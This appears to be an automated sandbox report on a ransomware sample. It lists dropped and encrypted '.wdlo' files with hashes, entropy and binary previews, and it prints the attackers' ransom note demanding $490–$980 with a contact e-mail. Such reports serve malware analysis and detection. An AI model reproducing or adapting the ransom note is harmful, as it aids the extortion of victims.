                  Preview:{"ram....F?..m.>....\|A._..].,..E....-..6t"..-..6.l&...2.7.s......S..$d.R....y?..'.......haBsX.9...S..T..:=9..%..!..1?..ixv...."%..J..X.:bnO.3.3.T9.p}.Tl..Z.#..yq.-.;..ur. ..F...h.m. ..<....>....=R...0......B.......K:<...$.....6/...2.J4WxpWs.7.........P~.}.....Q....^..\.....C.?...\..\..w.....KN:..^N.J..P....E/q.......E.1..\...I..pv.[..N..18.X..9..K...9......c.e./ a...v".#~.k..."./r......3d.........G...,.pN.*.[..K.Bv.&H.2uk..&p....~J.h,..i...*...'.:!i.N......H.J.y...7....i.,....y]. .>E......x..`o...r.F~T...4..l#~."=.pd..Kz.G...H..yk..L.M..*...f3....ZZ.....X._g....y[.jXQ....qi.%..<.x.&c..3.W.b...D.S"@-.....Me.9....1..8<......O..Hc.J..l..+5f...e]..=...97...cx.......1..u....q...s.gm`Q.3Rp.D.8........m@..<.`52.Ya...5..@..b..Q.......!.......*.s.'Q.t...F!..`%..44.@.$.g....F.\.s4x.......@.CM..^B9h.~...@..MM.Z.4...[..y.."W...K......U.,.....V.d..}......}W"Y..<)GD/.?.#.S.)^=:w.....'V.j:.%S...R;....q.>.`....UO.m....*.....Q\.l.."B...v..

                  C:\Users\user\Local Settings\Temp\wctDE6E.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS-DOS executable
                  Category:dropped
                  Size (bytes):42164934
                  Entropy (8bit):7.947667418144074
                  Encrypted:false
                  SSDEEP:786432:PwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59k:YQcWxDMPnN+dk65gGUjku4vNjLjk
                  MD5:7F34FD49325BFF7B58F8B5450434E3D2
                  SHA1:F076C8D39E0F8C8E0DE5DD840499EFADD25CD993
                  SHA-256:8D6F59BF4BBF7BCCA5897C563373CE4F444C7878A4CBBFA273872E36AFD2AF13
                  SHA-512:FDF601DD84FB569D2D4A0A17BB278E56CCF746330A11DA6B41BF9B96685B807871B78B4E20F60091BD5756C7E59AB4949ED76E3CDB07FA2880AAAA3221349D50
                  Malicious:true
                  Preview:MZ...gk*=..A.Fq..&e.*.......{......)*,...4@....OK..o.. \C2..<.O...1.R....~ ...N0s.....{.oY.*'i..L,.P6.9C}....vl`.....5..I&..;.g.B0........G.l.o(3.<c...-...u7b.0.^....w..&.[.A%....".m..-.ons)H...4.t..lxu1XU..Z....1......)..az..K[..I.......tj.$,.....e.IwJ.waI^G.F...`/}.EX..LV.Z.7p\...*......W.S...)%....k.p...$z7..h0x.>.O.O.0yiD$..]....0..<M.n..C..Z.4....M)@|..1...GI...6.......5. .~...LV<.6).C!...W...lnP.2......),.._.q.....|.I....0O.mInu....z.D.C.P......~.......<.@z#....^r..hk..ai..?.9.2 .....0...V.G%*....`.K.W..eV{...2t{w.u<!..^.);.~....2E..(l..!...q....UJv...>.k.^.....Jh..A...~...O &."..3.h.,.....JUz.......W.;Cn...c..*..<..........*.....}.O.=RK....).}..%..T.>.Q...@......].s..K../.3....?;./....|.k...wm.r.........).........>..g..!.F...4...J..4...7...*.....w*".....&V%%.L....]y.........uJ...4.2.l2.D;.UG..;T.k..N.)t-Y..~..w#s...a.4:.^.yGB.....Kz|X..f...uU...Y.....Wa.7/.S.N{.q...g.H.:.1.@.K.SG.U.....)_...O......`.X.+.kT..'.K.2b[t,..R.Lx..+...^

                  C:\Users\user\Local Settings\Temp\wmsetup.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1031
                  Entropy (8bit):7.7690890648801
                  Encrypted:false
                  SSDEEP:24:tJN8fluKGNITVdnjHNxDzIixwu+Z3IzByYiVBC2M2WeYFaxKbdCYniY3zbD:n8x9HNxDkCwu+2gNDdi3nD
                  MD5:B04706BC4D16DA13AAE71D81BD068944
                  SHA1:0AD16643E4026D63AEBA92C154C6B3DA4E56638A
                  SHA-256:5855E25B7DEE06E44493C4FDD2CFE6E97895C77DD759674ACBBCF688561B9792
                  SHA-512:AD9BB841767CF7F49C70FBBA22F6FEA45AC2FBB2A9D48646997A9F119C58662C5CBBF1FD96DB2E0CFCD338E1B168B34C1A99F420AC4199283E4CF052E489257A
                  Malicious:false
                  Preview:..[*W...mD~}..].AJyU.....c..O.Ku.......a>..^...+.6.Q?M.r.Il..(.E;~..Bv..!b.K.l.nA..##....X..."....-.a....-...p..b.L.........z.x.GOg@...G.T.5p....A..$..bLNRq..._`...V.0.c}F..iYJ.]d.........(.Al.~..D......t..(.!...W..r..a@X+A.&?.@n%..].'%....1.jiw,....d.9(.&....L.....\0k.g..........%q.#...K=nn...nY!U..Q.,.Es...8.i.D....6{.3&_..p.....cc.]......-......*&...=......L....K.m.!.22.\..0..~.HZyG..]X$7..a#......&...,:u_O....Zc....N...Y5.>.{.K&.>!b......ph7......F)i....r.......uL.X..B.9/Y...ln.A....*..n...^C...M..b..zw./.x.yN......*.5v....F../...6W..].M.G.....V]].JkG.GN.../....t7..._..R..J.#.i.R.1.(p.w...$..D).k..z.K.K.n..YIk..[.N.>..}....J.b..Q.Z.....5..%L..mf.P.T.sB{.......s.j...\u,....X-.....P....M.]qA F.C..H..DD./...du.v..{:C.....0.....g..y.D..L..!......xZze...{....xX.9W.bXv.^..oL3g..'.1...m.0..nM.(.Y.S...&..JV....p..v. ...U.u.........5&'.../?.N.....K...]..@...K....r8...(....#%wuj.+.G$.U.8.6..u..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698

                  C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1193
                  Entropy (8bit):7.81193375184828
                  Encrypted:false
                  SSDEEP:24:UpU61fHelogCKtbfND9jHKbBzatWMkCQLqaVe+zgD3zbD:lcmlbbVDla2oFlLqa7zgD3nD
                  MD5:F1F1B2B548EA81A77298F948839E98A5
                  SHA1:05280D895D0A709FBB94D1B4C894195E41582585
                  SHA-256:F5E2E9FC87FDC9F95923FCE56B494E1B3B300CCFCD616578F75A6AC74EC1CFD0
                  SHA-512:C59AF943A07EB183863435550E646E836EC0C196513DAA199D92960D8BA9509B5B3E32BF0693FBC32DC5B135625A6E5309CF88BC398ABAAF1CD8085805CF478A
                  Malicious:false
                  Preview:<?xml.5zg.AO.L......Q..8.{a[..|.$.$..e...C0y...iy.......!d..R.!..-.m.&.=.(.....xV..d9.....5......".k...S...qpR...:.G...C5.....'..V..r....X....I.....kF..(......^cn.....#HBr..rW.Fd....>,1.G..5..\ia>@5d{......S6.H..7&.]8.x...0..T..~(_..y+>Ad....e....e.........^.{..4....f....V1.x*^c.u...;ov#.o!.....k..^..4.b.. P..M...h1..6.A....l......3E.....W.v.>|.$!x....H.^>16.*3..&.o...9.._v....H...D....FW..l@...<..(..b..G*..8Rh.'.B.8.j=.......?0k.h.q...=....O..h\0&.".ffi8.Zz...cu.T}.[...HT...u.&SL.1.1..ffhD\.. ....x.'Ih..Qp....b..:.....Ke[.3,..}1.;..j,|RX.2>G..Qi...JR@\[...88.f.....(R%...E.%T#..M....nQ".....b.|!..].z.....IN..>.%.U.{G..f(.v.wxC.d/L./.e>...'.../.....R.6/I.!..8u.Z...e3..V.q..B.HZ.2S.&`.2...fn.d...O1.b9.w...i..dl..`..wB..)Qk...^........q_`.N...,.....S....L+...W.='........b..3....V...F~..y.d..u..o-..r..1...!...e~......\.+.D9...Z<...:c.G...........^......e.....%Z...g].C..k(G.U.S......._.`*......O. 3,..iw...T.-..h........HZX.

                  C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1193
                  Entropy (8bit):7.81193375184828
                  Encrypted:false
                  SSDEEP:24:UpU61fHelogCKtbfND9jHKbBzatWMkCQLqaVe+zgD3zbD:lcmlbbVDla2oFlLqa7zgD3nD
                  MD5:F1F1B2B548EA81A77298F948839E98A5
                  SHA1:05280D895D0A709FBB94D1B4C894195E41582585
                  SHA-256:F5E2E9FC87FDC9F95923FCE56B494E1B3B300CCFCD616578F75A6AC74EC1CFD0
                  SHA-512:C59AF943A07EB183863435550E646E836EC0C196513DAA199D92960D8BA9509B5B3E32BF0693FBC32DC5B135625A6E5309CF88BC398ABAAF1CD8085805CF478A
                  Malicious:false
                  Preview:<?xml.5zg.AO.L......Q..8.{a[..|.$.$..e...C0y...iy.......!d..R.!..-.m.&.=.(.....xV..d9.....5......".k...S...qpR...:.G...C5.....'..V..r....X....I.....kF..(......^cn.....#HBr..rW.Fd....>,1.G..5..\ia>@5d{......S6.H..7&.]8.x...0..T..~(_..y+>Ad....e....e.........^.{..4....f....V1.x*^c.u...;ov#.o!.....k..^..4.b.. P..M...h1..6.A....l......3E.....W.v.>|.$!x....H.^>16.*3..&.o...9.._v....H...D....FW..l@...<..(..b..G*..8Rh.'.B.8.j=.......?0k.h.q...=....O..h\0&.".ffi8.Zz...cu.T}.[...HT...u.&SL.1.1..ffhD\.. ....x.'Ih..Qp....b..:.....Ke[.3,..}1.;..j,|RX.2>G..Qi...JR@\[...88.f.....(R%...E.%T#..M....nQ".....b.|!..].z.....IN..>.%.U.{G..f(.v.wxC.d/L./.e>...'.../.....R.6/I.!..8u.Z...e3..V.q..B.HZ.2S.&`.2...fn.d...O1.b9.w...i..dl..`..wB..)Qk...^........q_`.N...,.....S....L+...W.='........b..3....V...F~..y.d..u..o-..r..1...!...e~......\.+.D9...Z<...:c.G...........^......e.....%Z...g].C..k(G.U.S......._.`*......O. 3,..iw...T.-..h........HZX.

                  C:\Users\user\SendTo\Bluetooth File Transfer.LNK.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1383
                  Entropy (8bit):7.887919196748003
                  Encrypted:false
                  SSDEEP:24:Qwxebx0qq88a8R5WcPXOtzWc9DUDSVseN1m/FdM5144oo0oTXH43zbD:ODq286uMzWc9DKe3iFR53nD
                  MD5:DB6E3827921AB26FD8AAACE720F000AB
                  SHA1:E33A3949916599B15FA8CB4C3B5E313B157493E5
                  SHA-256:DF08C2643E98BE038C075C9CB1D95DC59A1DF99C45AEA5A8E53ED9D4038914B6
                  SHA-512:92CFFFCBA3BFD24ECD1C27F987F27C760E4907EB0D40DCA7D969AD2731F52EBF532FCDA16C55D32324701E3B6E2FE070877876C52C40CCA963B56EDF2E78336D
                  Malicious:false
                  Preview:L.....X..W.q5..O...F.e...=....s..Y....|.Nl..Nd\.....'.....}..'.~Km..1&tl.....E....}.X.....$....X3...O0..E.z&&.t&ZC.]....r......6.NE..$.)0\x~..z.[S0.o.......K........H .c...?n..nC.....<4,.u.$j.[ueK.8$%.D.v.....p.B..1d.....I..2.J...7.P..i...TGF.pVqO...o.t....|.......3...l:.R..T\..p....>B.5.U.o...#.Xa?..z.5l....6.2...$.....g...h.N...I........s.....@A}%.....m..!....y.........+..xR.~..*f..m=r..3_.7....8....:...4J..2.!89[.qrS.u........./<zc.w...b..~.b.....#.^.L........`..]..m.|!y...q7\-D.TG..e.l$.`.#Fo.Z....%..+x.B..[>*."...$M@5...f.......!.....2.........kJ....S.s..q(...%.5..:......).\@.2.<.^.....s..|.;.Z{C..b<.(R/...[T.|i....X.4.vz1":U.....gX.xA..y%zf.....D..ttL.V.?..;.Su..t...........X...Jvo..}I..5(&..X'..n..+..........)...I.yg,....<bt*.@>..c...Q.......zy....^,...}{..N.s$-3.8....<?9.Lg......;....`{...._...+m....... W...3=.....NQL......4.rn..#.....c..h...0-S..]..YU'.....Q5..A.9..w.......p...=(.....34%! u.&9..d..y..b...;..o.u!

                  C:\Users\user\SendTo\Desktop (create shortcut).DeskLink.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):341
                  Entropy (8bit):7.344473402635217
                  Encrypted:false
                  SSDEEP:6:g2/vyIdOcMIXdrrM2QgVPnhuh8vbpSzMyoSQoWERobOsVolWbz6Wcii96Z:gAvmSFrM2QgVP4qvbpSzHi3+o936WciD
                  MD5:377740566CEA2BF4780DD6EAB4175192
                  SHA1:C09E45A9C528D0189DD56FEF12226BA49158636A
                  SHA-256:277DFEB2C1EB3D588A4D13C7E5F6507B6C0561B8679B5E8368D53D9F48A4618D
                  SHA-512:874317AD453E5F3252D76D14D9D3961C8C32779300173BA167A3B6713570E4F612F347B6F2A7397A6E1CC2EC85B40B909B2C4E661281C6B6CD225C16F5B7D926
                  Malicious:false
                  Preview:deskt:......MW.Uh.!._..S..u.m...Q.O..c.K<.h...........e.D.........]5...p.y.........r...l.Z]....+.{.Gi.H...OOMK.!.H%Z$.....R..P.1hR.s...)D/.3.].W0......^.Yo.n.].........N..7..9X.....I.w-..z..zb..G\...t._tv..".;O..8.......-G...+h=Ny.O).........i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\_readme.txt

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1106
                  Entropy (8bit):4.884025328365006
                  Encrypted:false
                  SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWtfFmFRqrl3W4kA+GT/kF5M2/kAApJx13b:WZHfv0p6WVFPFWrDGT0f/kj53b
                  MD5:35779C10C1797CD75D7E64C8579FED59
                  SHA1:68C0A5BF86F957E8976300A74F20F2785EEE204A
                  SHA-256:ABE1851BFD95CAC28F57A85B9770513ECB91F6A1629F879832AE653BD808CBE5
                  SHA-512:E2A89A0143FBA496DCCE1322CCDF88A576BEBB2F8D0C1EA13D2F5CF288D689DEA27672DCE969CE49AE9740E06C31E8B0FD197A447997D6B54DEEE1F56E483022
                  Malicious:true
                  Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-0S984cQ4B3..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@sysmail.ch....Reserve e-mail address to

                  C:\Users\jones\AppData\Local\Adobe\Color\ACECache11.lst

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):932
                  Entropy (8bit):7.745192310245474
                  Encrypted:false
                  SSDEEP:24:mOGh4Wi+C7jy2L2PUSeAToEgXnatzWelrtaHFyK6LfsCro3zbD:rP+4V9SzEEg3+zJlBQ1tSo3nD
                  MD5:B1DC3DAE85ADC53FC95112B89E5CE894
                  SHA1:A79C2ED62A1FFE78C9C0ECA4EC87DCCF061FE9F9
                  SHA-256:4F1A50C0947C6F40F8F4B8A3505FD8F8727925C419A7BD20140C3524DCA45EE7
                  SHA-512:D109ACA04A53B59B49ECABDD046370FABA4AFE118C86EA45ECBB5E64F6B7F8248197301C6BD9090BBB68C90052E00A45266663CD947FE86445CCDB730CB54FB5
                  Malicious:false
                  Preview:CPSA.r..K.........(..~U.{.5.M].......r@.g.N..ME.z3..Ch..:)..nOQw.L...ZaQ.T..........N...8...P.a....2.1!......j....v.o1...C)..E.x..4...$..H{...>...t....C ..m....e.U.Jg...HU.m.......$a8.1M..Q..[..Z.....$..@..75 .fX@...m...M.T...n..f/DL.8=...mQ(s..)O.=.[.!^.....3.8.....7.R...H{2T/7....e0....JRK7kd.[dm.G.GdBe-.4.L.......g#..n.....'s>...';.."!|.p....<.b......}k....:..A....<g.S;..r.... GC...?4..5...>.U.'....#C. ...S..)/.9...o..q+.f)...Q....B.}.e&..9.".g...n.....<.4#.$.U...R(..5-v..0....-,. ..I..{.m...|...].8}S.K~.[.w.......\[X'.\T.=....^|.,`J...F.,'.....A...{A%/<k.bv}.......Z.gFD.UE..G%..v.h........\.\2vgKA!`..9G;.v.rQV.x...}......6.T.tik.........h....C.+.:...^...2.Z.....3s..,k...XK.....g.....W.H...3..Ij....k.'..8...D..8.G.....2z...e..p........ .D.%..+.].N..''8..d.....A..J:..:J.CY...TZ`..d.C.4;.`B.-.j.h...C.......i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\AppData\Local\Comms\UnistoreDB\USS.jcp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.978460164485167
                  Encrypted:false
                  SSDEEP:192:ZB1CK+ezfIRwQFpn3vC58rMcjZnZzOuxMrOj8/4qgNliRCwOn:Z2K+cfawQT3vCiwcZZKu+rAnqgNwR0n
                  MD5:DF5822C8DFB8882E14DA6540F9E21D69
                  SHA1:E9FDD21B90831A3069652C19B82D510791972828
                  SHA-256:1D794B79FCC5EA98B12F84A0708204B354B7DDFBCEC8EC1FDFB11997B7723B7D
                  SHA-512:7A04317832AF2F7FE9CE86DBE59B15C1A8926089BD44E37F7D956B0F1D2710F9F0B853A1955A2DB4A073D7571BB2DE0E1334F969AA00EB4D67553D3C83E12596
                  Malicious:false
                  Preview:.M.#....f....u...$.X...Zn...c.G1o...j71\i..<D.Y.S g^XP...(...$.E>!#K.....Y....;F.T.W>.......W9.@.W...o.@.......M..6b..R..*.4...'...aM.z....q...."..a.K...D..lR..................%*..I>Y..."mD....Q...Q<..r.X....!B.7...h..*B..9...;&..%..B31.NF...7w..9G......l.L../..5...q.(e....<P....&..E.,4.....cC.I.b.K....p.3.-.NT...%..B..ff(:..Z.+.TG.....u>.{4#.i....RHR...(.......j.a8.Ip.zo...a.NC.1.w...L.....G..`...!.?T...{.P.\'Lf.........=<...d.1.%.,zu.>@....%.....f.o.......d#.TP..".....N..C..yf..mcr+..%....."...:..B.@...J.........`}.E~J...~P.K......n..J.m%.......]3Z.I......@..\.u.X`....&..u......!!..n..+v....J....$......eJ.<Y..v}... .ms&..;_.a..".x...,h....4.".)G.F.'n..._.L.~.......:...."..=..I......._ .5..c.m....CGC.R....Ly.5..7J..A...8...;V.#......B...Fd9*.Z.|.......n.@....9......T<:$...._..&s....L....98~y.d."..8q...gf.5z^.G.....I...GT..l.+U7..H*n'.%.N.Lh.....v.a.)..F<K.?im......TQ.).Im..OU.M.XW.."..........V...B.2.. ..A.E...'6.+.y..$.[.(.E.

                  C:\Users\jones\AppData\Local\Comms\UnistoreDB\USS.jtx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3146062
                  Entropy (8bit):1.730976270852684
                  Encrypted:false
                  SSDEEP:6144:+RNaxfJrSNacqff0mpLQOUOo3agO/qqv4RROYdVbtzFnrG5J5qh+AJ3TGXZAcbBw:brSNdmpLl3fCdYSN
                  MD5:D08A3022FFD6B0DC57C39558E323F11B
                  SHA1:C6B277D8C2DE1DEC5096ACD712126F75E4726C1A
                  SHA-256:F8424AB023FADC215DAB62536A1773044E3CD7ADC2903A23E68F23F46D9E8EDE
                  SHA-512:0A66F55D8C12201F211989F8D87430ECCD4420C6B84DE8FE60D52C1A0E29B29D19766E0BA62EF308E6E0F9DB10D19D8A4DE7650D7827A34C5D50A267EF05D8BD
                  Malicious:false
                  Preview:...?....e.@..\...(....!'yh.+_. ..W#.#U#.#B_?q./.].B\'.F....z|...q.<..i........5.v.cd.\..M..J......2....e*.X.a..2....nW..t.^..FT../t&.{p.^J.F^.Q."&.H:.|.<...}G...E1.U......L.*p.~2.iv...#....khF~2yI.....iS..LpB..z...NT......K.8..d..{....J....7.....<~+..t..B..9.q!k..^.D!.(b8r6..Z..!1xK.n...s...)S..\..W.^.....v|...h.[...T.4.r.......u..N...y..X..8..4.......".s..k..t..U.l..0....u.....7...({B.;...D.o....8.Z..z...F...P..2[.*.H.+....m.C..Nm>....GI....5a....v<2.49ub.v+..d3jS..u...&!...?..a.......xU/....,p..Y....o....;||o......7..@.n...2.t....y.W..o..&W%wU.}.?MKl.^... 2....dW,.(|....T......6`......[3..T..g..1x.qY:..6..w`nj.!..X.K".t.......{C..k..6...>1.(..]....A..D....b...s......'..j"...,.[..]..>X.O...v......T.GI....M..&.,....a....E..&.g.J.4..J.I(..R8.u?h......S..a.[....]....)E..4...S...G.5............C.|z...5....}.%2..:....].l.Q)..B...c....).^...:,x8...M.q..`G...F..-jbk..l'...\'bv.V...5 6<ta.....v......f..=....W.R....E(g.d.3.p_....#O.2.6....;uc#+#.~...(y.y

                  C:\Users\jones\AppData\Local\Comms\UnistoreDB\USSres00001.jrs

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3146062
                  Entropy (8bit):0.6706351534722407
                  Encrypted:false
                  SSDEEP:3072:qUn7Je/bmqlxbJ6qgxg+C5kvG0z0KXfriSq9gVwlPY4:H74txb0qgaWvG0zZXjiV6GJY4
                  MD5:AD539BDB58B7BBE3F3FADE3CFCFECD92
                  SHA1:52894C81D70FCABE203932C700829E06016A8DC6
                  SHA-256:91F29064A50A417AF0E52C25513B1B82A545624413047E5BD07911DF605778E9
                  SHA-512:BF0711FA27BD1A5F8AA14CFC97EFDC8CC987533ED6B707A9CE0FCA319A026B10932DA228692E116DE894A8FE5C5AB248D28B7141D4AAF85422066B7030A87EBA
                  Malicious:false
                  Preview:.....;ZK..K1...ad..u@#<@\.._p.+;o..|.. .|....C..w.\...Q[)B;..4?..O7s.a.#3..F....g..K......k~..r^..&...C....o....:.....R.:..1..B.+.c....+9(E..`.U.SS.S..7;.._....2.J......r.a..!..T....5.x...y.U..v..O._..,..w.."9..l.".s:.)..S..[.Nj.....kCu...H.a....4..$..;.+.D..":......fP.l.34......`....q.{.}.....u!z...2v...&,..}...V...]..,L..Bhp..pI.?.?ss.`].I5...M.....K....K.uJ/.....tD..z...r.c.(.D..bd...K.h...:[5.ei..|.l.|.5..Sb....Wjb.p.!...`..]O.\^..3......c.=.x.L....a...H...............Q......<..=^ .W ....T.T^O.....(w.........O....a../....1....A3..h..F.D...0.R...g...)...S...,..{.......>i[..* .N .a:b..q..1..3.M......2S.)ZR...a.@)Z..\..........S.>[.!...........N&....B.7....{*SY.Q.V...r.r....F..F.'..\..6b.Z...P..lmA......Z..2..........J.=.t.O.Q..8...._..x.4.W5..e.g.0~W`.s{X.......h.z...T.E0.e.g*..?#d..o3c.O......#.F.{.!....t.8......u%Php.I.rot.-I.!.9.{6.M%.X..T.z....D..w..E...0..[.].Dd...>J............k.`.Q..:.."...|..>.s>..~/.........V.L.N.

                  C:\Users\jones\AppData\Local\Comms\UnistoreDB\USSres00002.jrs

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3146062
                  Entropy (8bit):0.6705903005140648
                  Encrypted:false
                  SSDEEP:3072:qg+rxaHui6roxMG9bo469MvOckgbENStm34/40kbpt5z6E+IU:qvxa76r0vJo4ROckgwag4wvt5zcIU
                  MD5:79205213CB89A3F577035BA30E786BD3
                  SHA1:D2F804F75351FDB250885865C377ADA88BD94E99
                  SHA-256:9929EAC8D47495C8D8630FD60540667BC2094DD1289C00F548AF8152E564A0D6
                  SHA-512:9F647245C1CDC00C972CFBD78E2DAF98D894DEFB37E6F535C8D8EF1A796F95B5E1642CD7AE51F165823D448CF196EFB851B9F1E21D12B1A8C0870145E2022695
                  Malicious:false
                  Preview:......'.....J.v...s....?k|....w....QR.......<;..+6.`.h?@O8|.......#.,x..4..cG0.y[..X.....~..3...+...\.....q......;.k`Y../>M.O...C[.l...S.{"...z.I*...c4x.(........n.~.....JP..:..........(....&..:{...i.-.n...j.......).,\.]^u.r~\U{.#d..wO....m..SC.y.y.F~*..B.......#..H.........].,.~IZ.......g.>.j6.......C.7E?qw...5.ML.1.2..N....cE.F...E...f....>K.g...?QF.,...O.F.U.{..s....R7.....(.6.%.c..}..SPV.,..^.E..*d.Uu.i..y..w?..q.+..."C"....-gZ...{...B;..{t...c.3.-.......Qn...\.Ti....... ^..].(..9./n............?.5p..?.S...06R7.,z......_.lG.Ls.J.P.KG..".uW...6fNW.0.p..H..r.pX..q.8.:W....n.....(...xh.=...." .wMW..cRU.Q.....BY.4.....YM...Re..|.O-.i....x.~w......ZJf.r.9.e..X....3..y2.].o....%#..V1.'.K...i..%......./....Oy..o>W..b..*{.`.Z..#..%Jg...... .m....b_.....E.}...........].....A.FE.>..S.<....BM=..5oQ...h1..k.R.....p..IV.j..5.U....N.t.8. i....d@......U...q..5...Mv._...j..b...5/....D.qWGF.Hm.p..6.f:ec......$`g].W.5".1.....*b)a..2O...T......1..n..!IZP.?ee.

                  C:\Users\jones\AppData\Local\Comms\UnistoreDB\USStmp.jtx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3146062
                  Entropy (8bit):0.6706938930452939
                  Encrypted:false
                  SSDEEP:6144:c8Z87SCmChqD7UHULd4PVCucJmoewX8HR:c0cJoIHULd4P9cfZw
                  MD5:AF34F90802245A4D82AF25322A8C9ECA
                  SHA1:8404F72C2987D4BED2F6428CBD5CD9E56874CBAA
                  SHA-256:D1409720BBC8DD678AB29FB2519B63B8E74756D20571F93B12A2619691C459AE
                  SHA-512:79EDB72D4ABF0FD1E6C987DA504E620BF0A6421F75385365CAA40803418B215FCD54B51A1406ECE722AB531C128D96552A23DA856363CFC3938614E3B7F62C9B
                  Malicious:false
                  Preview:......_l.$.1c3#N-.$9cX..o..P#.d..K.i...|.".}!p8g...s...)J.......>B}8.e/.n.&...C....V..A^.o........4>3..".....u.@j....%+..B.Qw..O........V.....>i...G.i..3......].t.!XL....5.Q..?<3...<..~..s...=.....qQ...CW..~..].p.{..9Jw.=u.=..|`.....@......c2s=..O.._s`.n...c.,.b.-.n.0.p...%2.x.|:.z......."8...3.Y.........Q..f....x./...Y.o ....h...^..~0.w.RtU*.\.*..M.....d:3...v..r-.)u.?n..]........L.y....z...F&.Uq...4...7p...1j.....8.t^....U.o...T...._n.0..|\....g.9.,.8.?./...!3:.L0....-...t._`x.....c.......m......M.]...8zK..+..$......-..L._...4.(:u.".g......n!.-g..../....$.{.<n...cz......_Am...x_..)..z.P.h....O..W.G.'..|.f..0.....F.ac.a..X.r..M.<Y)26.....L.........,..!L.I...x.....l@[...n..]..[......>......dw..._...a..~:.&.'.....|.m8.....9XQ.l...f....rc.....f.[.Kp..4...X_Y.1.. .<...L..G.$.|~......BXh.J...xb........{.....*...n..H...s..(y......W.....c..}.Na.._.5:..bC.&Gczr...t<Q...c.x.o....p........M.C..*../...R'...!]m.S...<..d....9|..-...?Ht.#'.<.@8

                  C:\Users\jones\AppData\Local\Comms\UnistoreDB\store.jfm

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16718
                  Entropy (8bit):7.989179240573906
                  Encrypted:false
                  SSDEEP:384:qEqgHt2Gj/ZWShGPwsRMMhGyikbn8Y1PF1XYrsu:8gHnjxZhYMMhdik78Y1PF4su
                  MD5:34FC7B70C9A1FD78CF736865ACF637A6
                  SHA1:8FA1B318D396AF5813DAD507AD3ACEC638E961DC
                  SHA-256:71BFB137CADDF688DE8E68E469D5B1ED9E2D531469AEF45D7905657FE0C004E7
                  SHA-512:61AA271E6DC57C394DB8BE2B875C79FC103EA110B237235B070B2EFBA18B9F3380727852F2A7B577561906BD08EAD575FB6661D9A343273D4A2504A18BED9BF2
                  Malicious:false
